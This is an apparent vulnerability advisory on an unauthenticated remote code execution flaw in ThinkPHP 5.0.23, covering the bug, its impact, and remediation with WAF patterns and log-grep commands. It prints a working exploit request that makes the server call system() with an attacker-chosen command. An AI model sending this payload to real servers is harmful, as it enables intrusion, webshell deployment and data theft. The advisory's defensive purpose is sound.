CVE-2018-25270: Unauthenticated RCE in ThinkPHP 5.0.23
A critical remote code execution vulnerability originally identified in 2018 has been formally catalogued in the NVD as CVE-2018-25270, carrying a CVSS score of 9.8 (Critical). The flaw resides in ThinkPHP 5.0.23, a widely deployed PHP web application framework with significant adoption across Chinese-language web ecosystems and beyond.
The vulnerability allows unauthenticated remote attackers to execute arbitrary PHP functions — including system() and passthru() — by crafting a malicious HTTP request to the index.php endpoint and injecting a callable function name through the routing parameter. No credentials or prior access are required.
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2018-25270 |
| CVSS Score | 9.8 (Critical) |
| CWE Classification | CWE-77 — Improper Neutralization of Special Elements used in a Command |
| Affected Software | ThinkPHP 5.0.23 |
| Attack Vector | Network |
| Authentication Required | None |
| Privileges Required | None |
| User Interaction | None |
| NVD Published | April 22, 2026 |
| Original Flaw Discovery | 2018 |
Technical Details
ThinkPHP 5.0.23 is vulnerable because its routing engine accepts and processes a _method parameter that controls how the framework resolves and invokes controller methods. When the application is accessed via the captcha route, an attacker can override the HTTP method through _method=__construct and inject a callable function name via the filter[] parameter.
Example attack request:
GET /index.php?s=captcha HTTP/1.1
_method=__construct&filter[]=system&method=get&get[]=idThis causes ThinkPHP to invoke system("id") — or any other PHP callable — server-side, returning the command output to the attacker. The payload can be adapted to run arbitrary OS commands.
Impact of successful exploitation:
- Execute arbitrary OS commands — full shell access on the web server
- Read sensitive files — configuration files, environment variables, database credentials
- Deploy webshells — persistent backdoor access to the server
- Pivot to internal network — lateral movement from the compromised host
- Data exfiltration — access to any data reachable from the server process
Context and Impact
ThinkPHP is a popular MVC framework in PHP, particularly within the Chinese developer community, and version 5.0.x saw significant adoption before the 5.1.x and 6.x branches superseded it. While the vulnerability dates to 2018, its late formal CVE assignment means it is now surfacing in vulnerability scanners and compliance tools for the first time.
Who is affected:
- Any web application running ThinkPHP 5.0.23 with public-facing HTTP access
- Legacy systems, older e-commerce platforms, or inherited codebases not updated since 2018
Real-world exploitation history: This class of ThinkPHP routing injection vulnerabilities was actively mass-exploited in 2018–2019 by automated scanning campaigns that leveraged the flaw to install cryptominers, webshells, and botnets. Public proof-of-concept code has been available since the original disclosure.
Remediation
- Upgrade ThinkPHP — migrate from 5.0.23 to ThinkPHP 6.x or the latest supported release, which addresses this class of routing injection vulnerabilities
- Restrict access if upgrade is not feasible — disable or restrict access to the
captcharoute and any routes that allow__constructmethod invocation via request parameters - Web Application Firewall — deploy WAF rules to detect and block requests containing
_method=__constructandfilter[]=systempatterns - Audit for compromise — if running ThinkPHP 5.0.23, review web server logs for signs of exploitation:
grep -i "_method=__construct" /var/log/nginx/access.log
grep -i "filter\[" /var/log/nginx/access.log- File integrity monitoring — scan the webroot for unexpected
.phpfiles that may indicate a deployed webshell
Note: No official backport patch exists for ThinkPHP 5.0.23. Upgrading to a supported version is the only reliable remediation.
Key Takeaways
- CVE-2018-25270 is a critical unauthenticated RCE in ThinkPHP 5.0.23, now formally catalogued in NVD with CVSS 9.8
- No authentication required — any unauthenticated attacker with HTTP access can achieve remote code execution
- Exploitation is trivial — public PoC has existed since 2018; automated scanning campaigns targeted this vulnerability extensively
- Upgrade is the only safe fix — ThinkPHP 5.0.23 should be treated as end-of-life
- Audit existing deployments — organizations running legacy PHP applications should scan for ThinkPHP 5.0.x versions